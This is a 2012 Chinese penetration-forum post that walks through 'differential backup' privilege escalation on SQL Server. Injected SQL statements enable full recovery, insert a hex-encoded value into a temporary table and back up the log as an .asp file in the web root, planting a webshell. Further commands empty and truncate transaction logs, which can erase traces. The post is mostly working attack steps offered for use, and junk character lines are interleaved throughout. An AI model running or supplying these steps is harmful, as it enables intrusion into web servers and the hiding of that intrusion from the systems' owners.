中国网络渗透测试联盟
标题:
差异备份提权
[打印本页]
作者:
admin
时间:
2012-9-15 14:38
标题:
差异备份提权
select * from master.dbo.sysdatabases 列出所有列的记录
9 `# k* a; i/ X! Q/ o: j3 ~
2 R( `5 _8 {0 R1 e9 b. }9 Y4 \. }
select name from master.dbo.sysdatabases 仅列出name列的记录
$ R. G! w4 M0 f4 e0 f% x
+ w* w/ ^+ a8 o' S+ q( f
注意:可以利用log和数据库备份两上都行,log备份不成功用数据库备份
1 ]! r, D' `' q! |5 c" a- [/ ]
$ b( E( S6 |! x4 F r
alter database 数据库名 set RECOVERY FULL--
' {) J+ t' X# N N
/ B9 m8 A# Q* g. p7 ]
create table cmd (a image)-- \**cmd是创建的临时表
% X4 d" j8 x/ E' _! n. P3 ~$ ^9 l, q
" ]/ n$ T! X1 t# m
backup log 数据库名 to disk = 'f:\wwwroot\1.asp' with init--
8 z G7 c0 R/ ~7 j+ I( }
6 r; H- |, x8 A5 ` ^5 m1 f/ ~
insert into cmd(a) values (0x130a0d0a663A5CCDF8D5BE5CCDF8CDA8C6F3D2B5425C626C75656B6973735C7765625C312E6173700d0a)--
* C* ^- a8 O" L0 {8 d7 t
. m$ c0 v" w* d9 O- p
//木马存放路径(转换16进制0x130a0d0a替换原来0x最后添加0d0a要多加几个)
% B" ]9 J g0 J8 }/ ^& e
; A" ^: K4 [5 N `; Y
backup log 数据库名 to disk = 'f:\wwwroot\1.asp'-- (要备份的目录)
: @+ j l+ `4 ^% l- o! L1 D. ]
+ Q# y4 j' E+ O* [2 ]8 G$ m
drop table cmd--
" O8 `! t4 I; |8 `3 A
3 }7 n8 G; B& z) p! G" i* X
6 P" j4 s6 i) O; L
f:\
, I' y+ I# c9 }% A2 l- o
16进制转换(0x130a0d0a663A5CCDF8D5BE5CCDF8CDA8C6F3D2B5425C626C75656B6973735C7765625C312E6173700d0a)
/ v% Y- I" E" c2 z0 W
, t) R+ W8 i: M4 U
最好多加几个回车0d0a,要不会出错哈
1 S8 h" L' t2 E0 Q9 {2 ~
7 f5 X& K! r( U! r1 K% k: a
3 L) h6 I$ J9 `# p$ v: y2 `6 p
SQL Server日志清空方法
* Y8 u. @7 B& Q% C0 k8 E9 W
$ L1 u1 V8 q- u6 ~* W
在查询分析器中顺序执行以下三步,其中 databasename 为你的数据库文件名
# p! d4 f, z M0 F
1.清空日志:DUMP TRANSACTION databasename WITH NO_LOG
1 _ S7 ?% ^2 C0 y5 ?2 l+ p
2 R( t) z. H ?
2.截断事务日志:BACKUP LOG databasename WITH NO_LOG
3 R+ t% A( t3 g6 u
' z/ ?3 ?2 g+ |2 d( t. k, s# z
3.收缩数据库:DBCC SHRINKDATABASE(databasename)
+ T( V. [5 p- ]7 a! {3 D/ w8 C
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2